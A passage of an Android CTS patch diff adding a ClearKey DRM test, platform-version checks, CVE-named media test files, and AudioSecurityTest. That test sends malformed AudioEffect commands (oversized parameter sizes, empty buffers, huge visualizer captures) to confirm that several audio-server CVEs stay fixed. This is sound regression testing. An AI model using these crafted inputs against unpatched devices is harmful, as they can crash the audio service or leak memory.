+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package android.media.cts;
+
+import static org.junit.Assert.assertThat;
+import static org.junit.matchers.JUnitMatchers.containsString;
+
+import android.cts.util.MediaUtils;
+import android.net.Uri;
+import android.util.Log;
+import android.view.Surface;
+import android.view.SurfaceHolder;
+
+import com.google.android.collect.Lists;
+
+import java.nio.ByteBuffer;
+import java.util.ArrayList;
+import java.util.Iterator;
+import java.util.UUID;
+
+/**
+ * Tests MediaDrm NDK APIs. ClearKey system uses a subset of NDK APIs,
+ * this test only tests the APIs that are supported by ClearKey system.
+ */
+public class NativeClearKeySystemTest extends MediaPlayerTestBase {
+ private static final String TAG = NativeClearKeySystemTest.class.getSimpleName();
+
+ private static final int CONNECTION_RETRIES = 10;
+ private static final int VIDEO_WIDTH_CENC = 1280;
+ private static final int VIDEO_HEIGHT_CENC = 720;
+ private static final String ISO_BMFF_VIDEO_MIME_TYPE = "video/avc";
+ private static final String ISO_BMFF_AUDIO_MIME_TYPE = "audio/avc";
+ private static final Uri CENC_AUDIO_URL = Uri.parse(
+ "http://yt-dash-mse-test.commondatastorage.googleapis.com/media/" +
+ "car_cenc-20120827-8c.mp4");
+ private static final Uri CENC_CLEARKEY_VIDEO_URL = Uri.parse(
+ "http://yt-dash-mse-test.commondatastorage.googleapis.com/media/" +
+ "car_cenc-20120827-88.mp4");
+
+ private static final int UUID_BYTE_SIZE = 16;
+ private static final UUID CLEARKEY_SCHEME_UUID =
+ new UUID(0x1077efecc0b24d02L, 0xace33c1e52e2fb4bL);
+ private static final UUID BAD_SCHEME_UUID =
+ new UUID(0xffffffffffffffffL, 0xffffffffffffffffL);
+ private MediaCodecClearKeyPlayer mMediaCodecPlayer;
+
+ static {
+ try {
+ System.loadLibrary("ctsmediadrm_jni");
+ } catch (UnsatisfiedLinkError e) {
+ Log.e(TAG, "NativeClearKeySystemTest: Error loading JNI library");
+ e.printStackTrace();
+ }
+ try {
+ System.loadLibrary("mediandk");
+ } catch (UnsatisfiedLinkError e) {
+ Log.e(TAG, "NativeClearKeySystemTest: Error loading JNI library");
+ e.printStackTrace();
+ }
+ }
+
+ public static class PlaybackParams {
+ public Surface surface;
+ public String mimeType;
+ public String audioUrl;
+ public String videoUrl;
+ }
+
+ @Override
+ protected void setUp() throws Exception {
+ super.setUp();
+ if (false == deviceHasMediaDrm()) {
+ tearDown();
+ }
+ }
+
+ @Override
+ protected void tearDown() throws Exception {
+ super.tearDown();
+ }
+
+ private boolean deviceHasMediaDrm() {
+ // ClearKey is introduced after KitKat.
+ if (android.os.Build.VERSION.SDK_INT <= android.os.Build.VERSION_CODES.KITKAT) {
+ Log.i(TAG, "This test is designed to work after Android KitKat.");
+ return false;
+ }
+ return true;
+ }
+
+ private static final byte[] uuidByteArray(UUID uuid) {
+ ByteBuffer buffer = ByteBuffer.wrap(new byte[UUID_BYTE_SIZE]);
+ buffer.putLong(uuid.getMostSignificantBits());
+ buffer.putLong(uuid.getLeastSignificantBits());
+ return buffer.array();
+ }
+
+ public void testIsCryptoSchemeSupported() throws Exception {
+ assertTrue(isCryptoSchemeSupportedNative(uuidByteArray(CLEARKEY_SCHEME_UUID)));
+ }
+
+ public void testIsCryptoSchemeNotSupported() throws Exception {
+ assertFalse(isCryptoSchemeSupportedNative(uuidByteArray(BAD_SCHEME_UUID)));
+ }
+
+ public void testPssh() throws Exception {
+ assertTrue(testPsshNative(uuidByteArray(CLEARKEY_SCHEME_UUID),
+ CENC_CLEARKEY_VIDEO_URL.toString()));
+ }
+
+ public void testGetPropertyString() throws Exception {
+ StringBuffer value = new StringBuffer();
+ testGetPropertyStringNative(uuidByteArray(CLEARKEY_SCHEME_UUID), "description", value);
+ assertEquals("ClearKey CDM", value.toString());
+ }
+
+ public void testUnknownPropertyString() throws Exception {
+ try {
+ StringBuffer value = new StringBuffer();
+ testGetPropertyStringNative(uuidByteArray(CLEARKEY_SCHEME_UUID),
+ "unknown-property", value);
+ } catch (RuntimeException e) {
+ Log.e(TAG, "testUnknownPropertyString error = '" + e.getMessage() + "'");
+ assertThat(e.getMessage(), containsString("get property string returns"));
+ }
+ }
+
+ /**
+ * Tests native clear key system playback.
+ */
+ private void testClearKeyPlayback(
+ String mimeType, /*String initDataType,*/ Uri audioUrl, Uri videoUrl,
+ int videoWidth, int videoHeight) throws Exception {
+
+ if (!isCryptoSchemeSupportedNative(uuidByteArray(CLEARKEY_SCHEME_UUID))) {
+ throw new Error("Crypto scheme is not supported.");
+ }
+
+ IConnectionStatus connectionStatus = new ConnectionStatus(mContext);
+ if (!connectionStatus.isAvailable()) {
+ throw new Error("Network is not available, reason: " +
+ connectionStatus.getNotConnectedReason());
+ }
+
+ // If device is not online, recheck the status a few times.
+ int retries = 0;
+ while (!connectionStatus.isConnected()) {
+ if (retries++ >= CONNECTION_RETRIES) {
+ throw new Error("Device is not online, reason: " +
+ connectionStatus.getNotConnectedReason());
+ }
+ try {
+ Thread.sleep(100);
+ } catch (InterruptedException e) {
+ // do nothing
+ }
+ }
+ connectionStatus.testConnection(videoUrl);
+
+ if (!MediaUtils.checkCodecsForPath(mContext, videoUrl.getPath())) {
+ Log.i(TAG, "Device does not support " +
+ videoWidth + "x" + videoHeight + " resolution for " + mimeType);
+ return; // skip
+ }
+
+ // set to true if modify isVersionSmaller()
+ if (false)
+ unitTestIsVersionSmaller();
+
+ // This test requires two changes in frameworks/av (go/av/1628977 and
+ // go/ag/1598174) that are in 7.1.2 and above.
+ // Version 8 and above does not need this check.
+ if (isVersionSmaller(android.os.Build.VERSION.RELEASE, "7.1.2")) {
+ Log.i(TAG, "This test requires android \"7.1.2\" or higher.");
+ Log.i(TAG, "This device is running \"" +
+ android.os.Build.VERSION.RELEASE + "\".");
+ return; // skip
+ }
+ PlaybackParams params = new PlaybackParams();
+ params.surface = mActivity.getSurfaceHolder().getSurface();
+ params.mimeType = mimeType;
+ params.audioUrl = audioUrl.toString();
+ params.videoUrl = videoUrl.toString();
+
+ if (!testClearKeyPlaybackNative(
+ uuidByteArray(CLEARKEY_SCHEME_UUID), params)) {
+ Log.e(TAG, "Fails play back using native media drm APIs.");
+ }
+ params.surface.release();
+ }
+
+ private void unitTestIsVersionSmaller() {
+ assertTrue(isVersionSmaller("6.9", "7.1.2"));
+ assertTrue(isVersionSmaller("7.1", "7.1.2"));
+ assertTrue(isVersionSmaller("7.1.1", "7.1.2"));
+ assertTrue(isVersionSmaller("7.1.1.4", "7.1.2"));
+ assertFalse(isVersionSmaller("7.1.2", "7.1.2"));
+ assertFalse(isVersionSmaller("8.0", "7.1.2"));
+ assertFalse(isVersionSmaller("8.1.2", "7.1.2"));
+ }
+
+ private ArrayList<Integer> intVersion(String version) {
+ String versions[] = version.split("\\.");
+
+ ArrayList<Integer> versionNumbers = Lists.newArrayList();
+ for (String subVersion : versions) {
+ versionNumbers.add(Integer.parseInt(subVersion));
+ }
+ return versionNumbers;
+ }
+
+ /**
+ * Return true if smaller, return false if great than or equal to the
+ * target version.
+ */
+ private boolean isVersionSmaller(String testVersion, String targetVersion) {
+ ArrayList<Integer> intTestVersion = intVersion(testVersion);
+ ArrayList<Integer> intTargetVersion = intVersion(targetVersion);
+
+ Iterator itr = intTestVersion.iterator();
+ for (int targetNumber : intTargetVersion) {
+ if (itr.hasNext()) {
+ int testNumber = (int) itr.next();
+ if (testNumber == targetNumber) {
+ continue;
+ } else {
+ return testNumber < targetNumber;
+ }
+ } else {
+ // treat test version as 0
+ return 0 != targetNumber;
+ }
+ }
+ return false;
+ }
+
+ private static native boolean isCryptoSchemeSupportedNative(final byte[] uuid);
+
+ private static native boolean testClearKeyPlaybackNative(final byte[] uuid,
+ PlaybackParams params);
+
+ private static native boolean testGetPropertyStringNative(final byte[] uuid,
+ final String name, StringBuffer value);
+
+ private static native boolean testPsshNative(final byte[] uuid, final String videoUrl);
+
+ public void testClearKeyPlaybackCenc() throws Exception {
+ testClearKeyPlayback(
+ ISO_BMFF_VIDEO_MIME_TYPE,
+ CENC_AUDIO_URL,
+ CENC_CLEARKEY_VIDEO_URL,
+ VIDEO_WIDTH_CENC, VIDEO_HEIGHT_CENC);
+ }
+}
diff --git a/tests/tests/os/Android.mk b/tests/tests/os/Android.mk
index 3b55e87b..0ee48ff 100644
--- a/tests/tests/os/Android.mk
+++ b/tests/tests/os/Android.mk
@@ -51,3 +51,34 @@
include $(BUILD_CTS_PACKAGE)
include $(call all-makefiles-under,$(LOCAL_PATH))
+
+# platform version check (b/32056228)
+# ============================================================
+include $(CLEAR_VARS)
+
+LOCAL_MODULE := cts-platform-version-check
+LOCAL_MODULE_CLASS := ETC
+LOCAL_MODULE_TAGS := optional
+LOCAL_MODULE_PATH := $(TARGET_OUT_DATA_APPS)
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+
+cts_platform_version_path := cts/tests/tests/os/assets/platform_versions.txt
+cts_platform_version_string := $(shell cat $(cts_platform_version_path))
+
+include $(BUILD_SYSTEM)/base_rules.mk
+
+$(LOCAL_BUILT_MODULE) : $(cts_platform_version_path) build/core/version_defaults.mk
+ $(hide) if [ -z "$(findstring $(PLATFORM_VERSION),$(cts_platform_version_string))" ]; then \
+ echo "============================================================" 1>&2; \
+ echo "Could not find version \"$(PLATFORM_VERSION)\" in CTS platform version file:" 1>&2; \
+ echo "" 1>&2; \
+ echo " $(cts_platform_version_path)" 1>&2; \
+ echo "" 1>&2; \
+ echo "Most likely PLATFORM_VERSION in build/core/version_defaults.mk" 1>&2; \
+ echo "has changed and a new version must be added to this CTS file." 1>&2; \
+ echo "============================================================" 1>&2; \
+ exit 1; \
+ fi
+ @mkdir -p $(dir $@)
+ echo $(cts_platform_version_string) > $@
diff --git a/tests/tests/os/assets/platform_versions.txt b/tests/tests/os/assets/platform_versions.txt
new file mode 100644
index 0000000..6f9c237
--- /dev/null
+++ b/tests/tests/os/assets/platform_versions.txt
@@ -0,0 +1,3 @@
+7.1
+7.1.1
+7.1.2
diff --git a/tests/tests/os/src/android/os/cts/BuildVersionTest.java b/tests/tests/os/src/android/os/cts/BuildVersionTest.java
index 66066e9..d06171b 100644
--- a/tests/tests/os/src/android/os/cts/BuildVersionTest.java
+++ b/tests/tests/os/src/android/os/cts/BuildVersionTest.java
@@ -16,10 +16,16 @@
package android.os.cts;
+import android.content.res.AssetManager;
import android.os.Build;
import android.platform.test.annotations.RestrictedBuildTest;
+import android.support.test.InstrumentationRegistry;
import android.util.Log;
+import java.io.BufferedReader;
+import java.io.InputStream;
+import java.io.InputStreamReader;
+import java.io.IOException;
import java.util.Arrays;
import java.util.HashSet;
import java.util.Set;
@@ -29,17 +35,16 @@
public class BuildVersionTest extends TestCase {
private static final String LOG_TAG = "BuildVersionTest";
- private static final Set<String> EXPECTED_RELEASES =
- new HashSet<String>(Arrays.asList("7.1","7.1.1"));
private static final int EXPECTED_SDK = 25;
private static final String EXPECTED_BUILD_VARIANT = "user";
private static final String EXPECTED_TAG = "release-keys";
+ private static final String PLATFORM_VERSIONS_FILE = "platform_versions.txt";
@SuppressWarnings("deprecation")
@RestrictedBuildTest
public void testReleaseVersion() {
// Applications may rely on the exact release version
- assertAnyOf("BUILD.VERSION.RELEASE", Build.VERSION.RELEASE, EXPECTED_RELEASES);
+ assertAnyOf("BUILD.VERSION.RELEASE", Build.VERSION.RELEASE, getExpectedReleases());
assertEquals("Build.VERSION.SDK", "" + EXPECTED_SDK, Build.VERSION.SDK);
assertEquals("Build.VERSION.SDK_INT", EXPECTED_SDK, Build.VERSION.SDK_INT);
}
@@ -94,4 +99,20 @@
", should be one of: " + permittedValues);
}
}
+
+ private Set<String> getExpectedReleases() {
+ Set<String> expectedReleases = new HashSet<String>();
+ final AssetManager assets =
+ InstrumentationRegistry.getInstrumentation().getTargetContext().getAssets();
+ String line;
+ try (BufferedReader br =
+ new BufferedReader(new InputStreamReader(assets.open(PLATFORM_VERSIONS_FILE)))) {
+ while ((line = br.readLine()) != null) {
+ expectedReleases.add(line);
+ }
+ } catch (IOException e) {
+ fail("Could not open file " + PLATFORM_VERSIONS_FILE + " to run test");
+ }
+ return expectedReleases;
+ }
}
diff --git a/tests/tests/os/src/android/os/cts/SecurityPatchTest.java b/tests/tests/os/src/android/os/cts/SecurityPatchTest.java
index 4531aa6..68609e1 100644
--- a/tests/tests/os/src/android/os/cts/SecurityPatchTest.java
+++ b/tests/tests/os/src/android/os/cts/SecurityPatchTest.java
@@ -32,7 +32,7 @@
private static final String SECURITY_PATCH_DATE_ERROR =
"ro.build.version.security_patch should be \"%d-%02d\" or later. Found \"%s\"";
private static final int SECURITY_PATCH_YEAR = 2016;
- private static final int SECURITY_PATCH_MONTH = 12;
+ private static final int SECURITY_PATCH_MONTH = 06;
private boolean mSkipTests = false;
diff --git a/tests/tests/provider/src/android/provider/cts/MediaStoreIntentsTest.java b/tests/tests/provider/src/android/provider/cts/MediaStoreIntentsTest.java
index 7df2f97..529b176 100644
--- a/tests/tests/provider/src/android/provider/cts/MediaStoreIntentsTest.java
+++ b/tests/tests/provider/src/android/provider/cts/MediaStoreIntentsTest.java
@@ -17,7 +17,6 @@
package android.provider.cts;
import android.content.Intent;
-import android.content.pm.PackageManager;
import android.content.pm.ResolveInfo;
import android.net.Uri;
import android.provider.MediaStore;
@@ -69,9 +68,6 @@
}
public void testViewImageFile() {
- if (getContext().getPackageManager().hasSystemFeature(PackageManager.FEATURE_WATCH)) {
- return;
- }
final String[] schemes = new String[] {
"file", "http", "https", "content" };
final String[] mimes = new String[] {
diff --git a/tests/tests/security/Android.mk b/tests/tests/security/Android.mk
index 299be2e..a0ed953 100644
--- a/tests/tests/security/Android.mk
+++ b/tests/tests/security/Android.mk
@@ -32,33 +32,13 @@
LOCAL_JAVA_LIBRARIES := android.test.runner org.apache.http.legacy
LOCAL_JNI_SHARED_LIBRARIES := libctssecurity_jni libcts_jni libnativehelper_compat_libc++ \
- libnativehelper \
- libbinder \
- libutils \
- libmedia \
- libselinux \
- libcutils \
- libcrypto \
- libc++ \
- libbacktrace \
- libui \
- libsonivox \
- libexpat \
- libcamera_client \
- libgui \
- libaudioutils \
- libnbaio \
- libpcre2 \
- libpackagelistparser \
- libpowermanager \
- libbase \
- libunwind \
- libhardware \
- libsync \
- libcamera_metadata \
- libspeexresampler \
- liblzma \
- libstagefright_foundation
+ libnativehelper \
+ libcutils \
+ libcrypto \
+ libselinux \
+ libc++ \
+ libpcre2 \
+ libpackagelistparser
LOCAL_SRC_FILES := $(call all-java-files-under, src)\
src/android/security/cts/activity/ISecureRandomService.aidl\
diff --git a/tests/tests/security/AndroidManifest.xml b/tests/tests/security/AndroidManifest.xml
index 7468d68..7b87851 100644
--- a/tests/tests/security/AndroidManifest.xml
+++ b/tests/tests/security/AndroidManifest.xml
@@ -25,6 +25,7 @@
<uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />
<uses-permission android:name="android.permission.MODIFY_AUDIO_SETTINGS" />
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
+ <uses-permission android:name="android.permission.RECORD_AUDIO" />
<application>
<uses-library android:name="android.test.runner" />
diff --git a/tests/tests/security/jni/Android.mk b/tests/tests/security/jni/Android.mk
index 22420f8..5b8b49e 100644
--- a/tests/tests/security/jni/Android.mk
+++ b/tests/tests/security/jni/Android.mk
@@ -31,37 +31,16 @@
android_security_cts_MMapExecutableTest.cpp \
android_security_cts_EncryptionTest.cpp \
-LOCAL_C_INCLUDES := $(JNI_H_INCLUDE) \
- $(TOP)/frameworks/native/include/media/openmax
-
-LOCAL_SHARED_LIBRARIES := libnativehelper \
+LOCAL_SHARED_LIBRARIES := \
+ libnativehelper \
liblog \
- libutils \
- libmedia \
- libselinux \
- libdl \
libcutils \
libcrypto \
+ libselinux \
libc++ \
- libbacktrace \
- libui \
- libsonivox \
- libexpat \
- libcamera_client \
- libgui \
- libaudioutils \
- libnbaio \
libpcre2 \
libpackagelistparser \
- libpowermanager \
- libbase \
- libunwind \
- libhardware \
- libsync \
- libcamera_metadata \
- libspeexresampler \
- liblzma \
- libstagefright_foundation
+
LOCAL_C_INCLUDES += ndk/sources/cpufeatures
LOCAL_STATIC_LIBRARIES := cpufeatures
diff --git a/tests/tests/security/res/raw/bug_31647370.ogg b/tests/tests/security/res/raw/bug_31647370.ogg
new file mode 100644
index 0000000..31f602a
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_31647370.ogg
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_32322258.mp4 b/tests/tests/security/res/raw/bug_32322258.mp4
new file mode 100644
index 0000000..6fcab5e
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_32322258.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_32577290.mp3 b/tests/tests/security/res/raw/bug_32577290.mp3
new file mode 100644
index 0000000..1098bb0
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_32577290.mp3
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_32873375.mp4 b/tests/tests/security/res/raw/bug_32873375.mp4
new file mode 100644
index 0000000..71e9c7b
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_32873375.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_32915871.mp4 b/tests/tests/security/res/raw/bug_32915871.mp4
new file mode 100644
index 0000000..9e50aaa
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_32915871.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_33137046.mp4 b/tests/tests/security/res/raw/bug_33137046.mp4
new file mode 100644
index 0000000..01f49b2
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_33137046.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_33251605.bmp b/tests/tests/security/res/raw/bug_33251605.bmp
new file mode 100644
index 0000000..0060ff4
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_33251605.bmp
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_33300701.tiff b/tests/tests/security/res/raw/bug_33300701.tiff
new file mode 100644
index 0000000..ea7a477
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_33300701.tiff
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_33818508.mp4 b/tests/tests/security/res/raw/bug_33818508.mp4
new file mode 100644
index 0000000..d2f2604
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_33818508.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_33897722.gif b/tests/tests/security/res/raw/bug_33897722.gif
new file mode 100755
index 0000000..7a563d7
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_33897722.gif
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2016_2429_b_27211885.mp3 b/tests/tests/security/res/raw/cve_2016_2429_b_27211885.mp3
new file mode 100644
index 0000000..0232e70
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2016_2429_b_27211885.mp3
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2016_2507.mp4 b/tests/tests/security/res/raw/cve_2016_2507.mp4
new file mode 100644
index 0000000..ca248e1
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2016_2507.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/onekhzsine_90sec.mp3 b/tests/tests/security/res/raw/onekhzsine_90sec.mp3
new file mode 100644
index 0000000..3049011
--- /dev/null
+++ b/tests/tests/security/res/raw/onekhzsine_90sec.mp3
Binary files differ
diff --git a/tests/tests/security/src/android/security/cts/AudioSecurityTest.java b/tests/tests/security/src/android/security/cts/AudioSecurityTest.java
new file mode 100644
index 0000000..0d453da
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/AudioSecurityTest.java
@@ -0,0 +1,409 @@
+/*
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package android.security.cts;
+
+import android.cts.util.CtsAndroidTestCase;
+import android.media.AudioFormat;
+import android.media.AudioManager;
+import android.media.AudioTrack;
+import android.media.audiofx.AudioEffect;
+import android.util.Log;
+
+import java.nio.ByteBuffer;
+import java.nio.ByteOrder;
+import java.util.Arrays;
+import java.util.UUID;
+
+public class AudioSecurityTest extends CtsAndroidTestCase {
+ private static final String TAG = "AudioSecurityTest";
+
+ private static final int ERROR_DEAD_OBJECT = -7; // AudioEffect.ERROR_DEAD_OBJECT
+
+ // should match audio_effect.h (native)
+ private static final int EFFECT_CMD_SET_PARAM = 5;
+ private static final int EFFECT_CMD_GET_PARAM = 8;
+ private static final int EFFECT_CMD_OFFLOAD = 20;
+ private static final int SIZEOF_EFFECT_PARAM_T = 12;
+
+ private static void verifyZeroReply(byte[] reply) throws Exception {
+ int count = 0;
+ for (byte b : reply) {
+ if (b != 0) {
+ count++;
+ }
+ }
+ assertEquals("reply has " + count + " nonzero values", 0 /* expected */, count);
+ }
+
+ // @FunctionalInterface
+ private interface TestEffect {
+ void test(AudioEffect audioEffect) throws Exception;
+ }
+
+ private static void testAllEffects(String testName, TestEffect testEffect) throws Exception {
+ int failures = 0;
+ for (AudioEffect.Descriptor descriptor : AudioEffect.queryEffects()) {
+ final AudioEffect audioEffect;
+ try {
+ audioEffect = (AudioEffect)AudioEffect.class.getConstructor(
+ UUID.class, UUID.class, int.class, int.class).newInstance(
+ descriptor.type,
+ descriptor.uuid, // uuid overrides type
+ 0 /* priority */, 0 /* audioSession */);
+ } catch (Exception e) {
+ Log.w(TAG, "effect " + testName + " " + descriptor.name
+ + " cannot be created (ignoring)");
+ continue; // OK;
+ }
+ try {
+ testEffect.test(audioEffect);
+ Log.d(TAG, "effect " + testName + " " + descriptor.name + " success");
+ } catch (Exception e) {
+ Log.e(TAG, "effect " + testName + " " + descriptor.name + " failed!");
+ ++failures;
+ } catch (AssertionError e) {
+ Log.e(TAG, "effect " + testName + " " + descriptor.name + " failed!");
+ ++failures;
+ }
+ }
+ assertEquals("found " + testName + " " + failures + " failures",
+ 0 /* expected */, failures);
+ }
+
+ // b/28173666
+ public void testAllEffectsGetParameterAttemptOffload_CVE_2016_3745() throws Exception {
+ testAllEffects("get parameter attempt offload",
+ new TestEffect() {
+ @Override
+ public void test(AudioEffect audioEffect) throws Exception {
+ testAudioEffectGetParameter(audioEffect, true /* offload */);
+ }
+ });
+ }
+
+ // b/32438594
+ // b/32624850
+ // b/32635664
+ public void testAllEffectsGetParameter2AttemptOffload_CVE_2017_0398() throws Exception {
+ testAllEffects("get parameter2 attempt offload",
+ new TestEffect() {
+ @Override
+ public void test(AudioEffect audioEffect) throws Exception {
+ testAudioEffectGetParameter2(audioEffect, true /* offload */);
+ }
+ });
+ }
+
+ // b/30204301
+ public void testAllEffectsSetParameterAttemptOffload_CVE_2016_3924() throws Exception {
+ testAllEffects("set parameter attempt offload",
+ new TestEffect() {
+ @Override
+ public void test(AudioEffect audioEffect) throws Exception {
+ testAudioEffectSetParameter(audioEffect, true /* offload */);
+ }
+ });
+ }
+
+ private static void testAudioEffectGetParameter(
+ AudioEffect audioEffect, boolean offload) throws Exception {
+ if (audioEffect == null) {
+ return;
+ }
+ try {
+ // 1) set offload_enabled
+ if (offload) {
+ byte command[] = new byte[8];
+ Arrays.fill(command, (byte)1);
+ byte reply[] = new byte[4]; // ignored
+
+ /* ignored */ AudioEffect.class.getDeclaredMethod(
+ "command", int.class, byte[].class, byte[].class).invoke(
+ audioEffect, EFFECT_CMD_OFFLOAD, command, reply);
+ }
+
+ // 2) get parameter with invalid psize
+ {
+ byte command[] = new byte[30];
+ Arrays.fill(command, (byte)0xDD);
+ byte reply[] = new byte[30];
+
+ Integer ret = (Integer) AudioEffect.class.getDeclaredMethod(
+ "command", int.class, byte[].class, byte[].class).invoke(
+ audioEffect, EFFECT_CMD_GET_PARAM, command, reply);
+
+ assertTrue("Audio server might have crashed", ret != ERROR_DEAD_OBJECT);
+ verifyZeroReply(reply);
+ }
+
+ // NOTE: an alternative way of checking crash:
+ //
+ // Thread.sleep(1000 /* millis */);
+ // assertTrue("Audio server might have crashed",
+ // audioEffect.setEnabled(false) != AudioEffect.ERROR_DEAD_OBJECT);
+ } catch (NoSuchMethodException e) {
+ Log.w(TAG, "AudioEffect.command() does not exist (ignoring)"); // OK
+ } finally {
+ audioEffect.release();
+ }
+ }
+
+ private static void testAudioEffectGetParameter2(
+ AudioEffect audioEffect, boolean offload) throws Exception {
+ if (audioEffect == null) {
+ return;
+ }
+ try {
+ // 1) set offload_enabled
+ if (offload) {
+ byte command[] = new byte[8];
+ Arrays.fill(command, (byte)1);
+ byte reply[] = new byte[4]; // ignored
+
+ /* ignored */ AudioEffect.class.getDeclaredMethod(
+ "command", int.class, byte[].class, byte[].class).invoke(
+ audioEffect, EFFECT_CMD_OFFLOAD, command, reply);
+ }
+
+ // 2) get parameter with small command size but large psize
+ {
+ final int parameterSize = 0x100000;
+
+ byte command[] = ByteBuffer.allocate(5 * 4 /* capacity */)
+ .order(ByteOrder.nativeOrder())
+ .putInt(0) // status (unused)
+ .putInt(parameterSize) // psize (very large)
+ .putInt(0) // vsize
+ .putInt(0x04030201) // data[0] (param too small for psize)
+ .putInt(0x08070605) // data[4]
+ .array();
+ byte reply[] = new byte[parameterSize + SIZEOF_EFFECT_PARAM_T];
+
+ Integer ret = (Integer) AudioEffect.class.getDeclaredMethod(
+ "command", int.class, byte[].class, byte[].class).invoke(
+ audioEffect, EFFECT_CMD_GET_PARAM, command, reply);
+
+ verifyZeroReply(reply);
+ assertTrue("Audio server might have crashed", ret != ERROR_DEAD_OBJECT);
+ }
+ } catch (NoSuchMethodException e) {
+ Log.w(TAG, "AudioEffect.command() does not exist (ignoring)"); // OK
+ } finally {
+ audioEffect.release();
+ }
+ }
+
+ private static void testAudioEffectGetParameter3(AudioEffect audioEffect) throws Exception {
+ if (audioEffect == null) {
+ return;
+ }
+ try {
+ // 1) get parameter with zero command size
+ {
+ final int parameterSize = 0x10;
+
+ Integer ret = (Integer) AudioEffect.class.getDeclaredMethod(
+ "command", int.class, byte[].class, byte[].class).invoke(
+ audioEffect,
+ EFFECT_CMD_GET_PARAM,
+ new byte[0] /* command */,
+ new byte[parameterSize + SIZEOF_EFFECT_PARAM_T] /* reply */);
+
+ assertTrue("Audio server might have crashed", ret != ERROR_DEAD_OBJECT);
+ }
+ } catch (NoSuchMethodException e) {
+ Log.w(TAG, "AudioEffect.command() does not exist (ignoring)"); // OK
+ } finally {
+ audioEffect.release();
+ }
+ }
+
+ private static void testAudioEffectSetParameter(
+ AudioEffect audioEffect, boolean offload) throws Exception {
+ if (audioEffect == null) {
+ return;
+ }
+ try {
+ // 1) set offload_enabled
+ if (offload) {
+ byte command[] = new byte[8];
+ Arrays.fill(command, (byte)1);
+ byte reply[] = new byte[4]; // ignored
+
+ /* ignored */ AudioEffect.class.getDeclaredMethod(
+ "command", int.class, byte[].class, byte[].class).invoke(
+ audioEffect, EFFECT_CMD_OFFLOAD, command, reply);
+ }
+
+ // 2) set parameter with invalid psize
+ {
+ byte command[] = ByteBuffer.allocate(5 * 4 /* capacity */)
+ .order(ByteOrder.nativeOrder())
+ .putInt(0) // status (unused)
+ .putInt(0xdddddddd) // psize (very large)
+ .putInt(4) // vsize
+ .putInt(1) // data[0] (param too small for psize)
+ .putInt(0) // data[4]
+ .array();
+ byte reply[] = new byte[4]; // returns status code (ignored)
+
+ Integer ret = (Integer) AudioEffect.class.getDeclaredMethod(
+ "command", int.class, byte[].class, byte[].class).invoke(
+ audioEffect, EFFECT_CMD_SET_PARAM, command, reply);
+
+ assertTrue("Audio server might have crashed", ret != ERROR_DEAD_OBJECT);
+ // on failure reply may contain the status code.
+ }
+ } catch (NoSuchMethodException e) {
+ Log.w(TAG, "AudioEffect.command() does not exist (ignoring)"); // OK
+ } finally {
+ audioEffect.release();
+ }
+ }
+
+ private static void testAudioEffectSetOffload(AudioEffect audioEffect) throws Exception {
+ if (audioEffect == null) {
+ return;
+ }
+ try {
+ // 1) set offload_enabled with zero command and reply size
+ {
+ Integer ret = (Integer) AudioEffect.class.getDeclaredMethod(
+ "command", int.class, byte[].class, byte[].class).invoke(
+ audioEffect,
+ EFFECT_CMD_OFFLOAD,
+ new byte[0] /* command */,
+ new byte[0] /* reply */);
+
+ assertTrue("Audio server might have crashed", ret != ERROR_DEAD_OBJECT);
+ }
+ } catch (NoSuchMethodException e) {
+ Log.w(TAG, "AudioEffect.command() does not exist (ignoring)"); // OK
+ } finally {
+ audioEffect.release();
+ }
+ }
+
+ // should match effect_visualizer.h (native)
+ private static final String VISUALIZER_TYPE = "e46b26a0-dddd-11db-8afd-0002a5d5c51b";
+ private static final int VISUALIZER_CMD_CAPTURE = 0x10000;
+ private static final int VISUALIZER_PARAM_CAPTURE_SIZE = 0;
+
+ // b/31781965
+ public void testVisualizerCapture_CVE_2017_0396() throws Exception {
+ // Capture params
+ final int CAPTURE_SIZE = 1 << 24; // 16MB seems to be large enough to cause a SEGV.
+ final byte[] captureBuf = new byte[CAPTURE_SIZE];
+
+ // Track params
+ final int sampleRate = 48000;
+ final int format = AudioFormat.ENCODING_PCM_16BIT;
+ final int loops = 1;
+ final int seconds = 1;
+ final int channelCount = 2;
+ final int bufferFrames = seconds * sampleRate;
+ final int bufferSamples = bufferFrames * channelCount;
